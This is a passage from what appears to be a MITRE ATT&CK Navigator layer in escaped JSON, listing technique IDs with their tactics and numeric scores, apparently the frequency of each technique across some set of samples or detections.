\"defense-evasion\",\n      \"score\": 26,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1055.011\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1055.011\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1548.002\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 56,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1548.002\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 56,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1543\",\n      \"tactic\": \"persistence\",\n      \"score\": 9,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1543\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 9,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1599.001\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1218.014\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1220\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 5,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1574.007\",\n      \"tactic\": \"persistence\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1574.007\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1574.007\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1027.002\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1202\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 39,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1129\",\n      \"tactic\": \"execution\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1518\",\n      \"tactic\": \"discovery\",\n      \"score\": 4,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1588.002\",\n      \"tactic\": \"resource-development\",\n      \"score\": 9,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1070.001\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 7,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1218.001\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 6,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1546.002\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 4,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1546.002\",\n      \"tactic\": \"persistence\",\n      \"score\": 4,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1587.001\",\n      \"tactic\": \"resource-development\",\n      \"score\": 11,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1074.001\",\n      \"tactic\": \"collection\",\n      \"score\": 4,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1027.004\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 6,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1574.011\",\n      \"tactic\": \"persistence\",\n      \"score\": 11,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1574.011\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 11,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1574.011\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 11,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1012\",\n      \"tactic\": \"discovery\",\n      \"score\": 14,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1574.008\",\n      \"tactic\": \"persistence\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1574.008\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1574.008\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1027.009\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1087.002\",\n      \"tactic\": \"discovery\",\n      \"score\": 21,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1090.001\",\n      \"tactic\": \"command-and-control\",\n      \"score\": 6,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1216\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 13,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1615\",\n      \"tactic\": \"discovery\",\n      \"score\": 5,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1546.011\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 6,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1546.011\",\n      \"tactic\": \"persistence\",\n      \"score\": 6,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1552.002\",\n      \"tactic\": \"credential-access\",\n      \"score\": 5,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1072\",\n      \"tactic\": \"execution\",\n      \"score\": 4,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1072\",\n      \"tactic\": \"lateral-movement\",\n      \"score\": 4,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1218.008\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 8,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1048.001\",\n      \"tactic\": \"exfiltration\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1132.001\",\n      \"tactic\": \"command-and-control\",\n      \"score\": 4,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1547.001\",\n      \"tactic\": \"persistence\",\n      \"score\": 39,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1547.001\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 39,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1505.005\",\n      \"tactic\": \"persistence\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1556.002\",\n      \"tactic\": \"credential-access\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1556.002\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1556.002\",\n      \"tactic\": \"persistence\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1546.008\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 6,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1546.008\",\n      \"tactic\": \"persistence\",\n      \"score\": 6,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1546.007\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 4,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1546.007\",\n      \"tactic\": \"persistence\",\n      \"score\": 4,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1547.014\",\n      \"tactic\": \"persistence\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1547.014\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1547.010\",\n      \"tactic\": \"persistence\",\n      \"score\": 4,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1547.010\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 4,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1547.002\",\n      \"tactic\": \"persistence\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1547.002\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1564.006\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1069.002\",\n      \"tactic\": \"discovery\",\n      \"score\": 15,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1053.005\",\n      \"tactic\": \"execution\",\n      \"score\": 51,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1053.005\",\n      \"tactic\": \"persistence\",\n      \"score\": 51,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1053.005\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 51,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1027.005\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 4,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1218.002\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1546\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 10,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1546\",\n      \"tactic\": \"persistence\",\n      \"score\": 10,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1204.004\",\n      \"tactic\": \"execution\",\n      \"score\": 6,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1027.010\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 8,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1562.010\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1134.002\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 6,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1134.002\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 6,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1219\",\n      \"tactic\": \"command-and-control\",\n      \"score\": 6,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1218.013\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1564.003\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 8,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1555.003\",\n      \"tactic\": \"credential-access\",\n      \"score\": 8,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1547\",\n      \"tactic\": \"persistence\",\n      \"score\": 7,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1547\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 7,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1218.007\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 10,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1574.005\",\n      \"tactic\": \"persistence\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1574.005\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1574.005\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1491.001\",\n      \"tactic\": \"impact\",\n      \"score\": 4,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1546.001\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 5,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1546.001\",\n      \"tactic\": \"persistence\",\n      \"score\": 5,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1608\",\n      \"tactic\": \"resource-development\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1539\",\n      \"tactic\": \"credential-access\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1211\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 4,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1563.002\",\n      \"tactic\": \"lateral-movement\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1552.006\",\n      \"tactic\": \"credential-access\",\n      \"score\": 6,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1560\",\n      \"tactic\": \"collection\",\n      \"score\": 4,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1505.002\",\n      \"tactic\": \"persistence\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1542.001\",\n      \"tactic\": \"persistence\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1542.001\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1176.001\",\n      \"tactic\": \"persistence\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1649\",\n      \"tactic\": \"credential-access\",\n      \"score\": 5,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1555.004\",\n      \"tactic\": \"credential-access\",\n      \"score\": 4,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1553.005\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 6,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1569\",\n      \"tactic\": \"execution\",\n      \"score\": 4,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1120\",\n      \"tactic\": \"discovery\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1542.003\",\n      \"tactic\": \"persistence\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1542.003\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1614.001\",\n      \"tactic\": \"discovery\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1484.001\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 6,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1484.001\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 6,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1021.005\",\n      \"tactic\": \"lateral-movement\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1119\",\n      \"tactic\": \"collection\",\n      \"score\": 5,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1590.001\",\n      \"tactic\": \"reconnaissance\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1546.015\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 9,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1546.015\",\n      \"tactic\": \"persistence\",\n      \"score\": 9,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1134\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 2,\n      \"color\": \"\",\n      